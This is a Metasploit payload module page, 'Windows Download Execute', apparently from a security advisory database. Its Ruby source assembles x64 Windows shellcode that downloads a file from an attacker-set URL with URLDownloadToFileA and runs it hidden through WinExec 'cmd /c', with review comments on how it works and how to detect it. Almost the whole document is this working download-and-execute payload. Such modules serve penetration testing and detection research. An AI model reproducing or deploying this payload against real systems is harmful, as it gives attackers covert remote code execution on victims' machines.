
Windows Download Execute

🗓️ 13 Aug 2025 18:54:57Reported by Muzaffer Umut ŞAHİN <[email protected]>Type 
metasploit

Downloads a file from a URL and executes it on Windows.

# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  # Size in bytes the framework caches for this payload.
  # NOTE(review): the assembled output embeds URL and FILEPATH verbatim
  # (see generate), so the real length varies with those options — confirm
  # this fixed value is what the framework expects for option-dependent payloads.
  CachedSize = 353

  include Msf::Payload::Single
  include Msf::Payload::Windows
  include Msf::Payload::Windows::BlockApi_x64

  # Registers module metadata and the three user options:
  #   URL      - location the file is fetched from (default http://localhost/hi.exe)
  #   FILEPATH - where the fetched file is written on the target (default fox.exe)
  #   DISPLAY  - HIDE or SHOW; selects the window-show argument passed to WinExec
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Download Execute',
        'Description' => 'Downloads and executes the file from the specified url.',
        'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64
      )
    )

    # Enum values for DISPLAY; the first entry (HIDE) is the default.
    display_options = %w[HIDE SHOW]

    register_options(
      [
        OptString.new('URL', [true, 'The url to download the file from.', 'http://localhost/hi.exe']),
        OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.exe']),
        OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
      ]
    )
  end

  # Assembles the x64 stager as raw bytes.
  #
  # Observable behaviour of the emitted code, in order:
  #   1. resolves APIs through the block_api hash-lookup stub (asm_block_api),
  #   2. LoadLibraryA("urlmon.dll"),
  #   3. URLDownloadToFileA(NULL, URL, FILEPATH, 0, NULL),
  #   4. WinExec("cmd /c <FILEPATH>", 0 or 1 depending on DISPLAY),
  #   5. ExitProcess(0) or ExitThread(0) when EXITFUNC is 'process' or 'thread';
  #      for any other EXITFUNC value nothing is appended after WinExec.
  # From a detection standpoint the distinctive sequence is a urlmon.dll load
  # followed by a file write to FILEPATH and a cmd.exe child process.
  #
  # @param _opts [Hash] unused
  # @return [String] assembled shellcode bytes
  def generate(_opts = {})
    # Fall back to the registered defaults if the datastore lacks a value.
    url = datastore['URL'] || 'http://localhost/hi.exe'
    file = datastore['FILEPATH'] || 'fox.exe'
    display = datastore['DISPLAY'] || 'HIDE'
    # Byte lengths are used below as offsets of the sentinel byte that is
    # XORed to zero at runtime to terminate each string.
    url_length = url.bytesize
    file_length = file.bytesize
    # Presumably turns the raw strings into assembler data directives so they
    # can be interpolated into the listing.
    url = Metasm::Shellcode.define_data(url)
    file = Metasm::Shellcode.define_data(file)

    # Each embedded string ends in a printable sentinel ('K', 'A', 'C', 'F')
    # rather than a literal zero; the code XORs that byte with itself to
    # produce the NUL terminator — presumably to keep NUL bytes out of the
    # emitted shellcode. `call main` pushes the address of the block_api
    # stub, which `pop rbp` then keeps as the API resolver called via `call rbp`.
    payload = %^
            cld
            and rsp, -16
            call main
            #{asm_block_api}

        main:
            pop rbp
            call LoadLibrary
            db "urlmon.dllK"

        LoadLibrary:
            pop rcx ; rcx points to the dll name.
            xor byte [rcx+10], 'K' ; null terminator
            mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
            call rbp ; LoadLibraryA("urlmon.dll")
            ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.

        SetUrl:
            call SetFile
            #{url}
            db 0x41

        SetFile:
            pop rdx ; 2nd argument
            xor byte [rdx+#{url_length}], 'A' ; null terminator
            call UrlDownloadToFile
            #{file}
            db 0x43

        UrlDownloadToFile:
            pop r8 ; 3rd argument
            xor byte [r8+#{file_length}], 'C' ; null terminator
            xor rcx,rcx ; 1st argument
            xor r9,r9   ; 4th argument
            sub rsp, 8
            push rcx    ; 5th argument
            mov r10d, #{block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
            call rbp

        SetCommand:
            call Exec
            db "cmd /c "
            #{file}
            db 0x46

        Exec:
            pop rcx ; 1st argument
            xor byte [rcx+#{file_length + 7}], 'F' ; null terminator
            mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')}
            xor rdx, rdx ; 2nd argument
        ^

    # The `call rbp` that actually invokes WinExec lives in these branches;
    # rdx stays 0 (SW_HIDE) for HIDE and is bumped to 1 (SW_NORMAL) for SHOW.
    # DISPLAY is an OptEnum restricted to these two values, so one branch is
    # always taken.
    if display == 'HIDE'
      hide = %(
            call rbp
            )
      payload << hide

    elsif display == 'SHOW'
      show = %(
            inc rdx ; SW_NORMAL = 1
            call rbp
            )
      payload << show
    end

    # Optional clean exit; rcx is zeroed so the exit code is 0 in both cases.
    if datastore['EXITFUNC'] == 'process'
      exit_asm = %(
            xor rcx,rcx
            mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
            call rbp
            )
      payload << exit_asm

    elsif datastore['EXITFUNC'] == 'thread'
      exit_asm = %(
            xor rcx,rcx
            mov r10d, #{block_api_hash('kernel32.dll', 'ExitThread')}
            call rbp
            )
      payload << exit_asm
    end

    # Assemble the text listing for x64 and return the raw byte string.
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
end
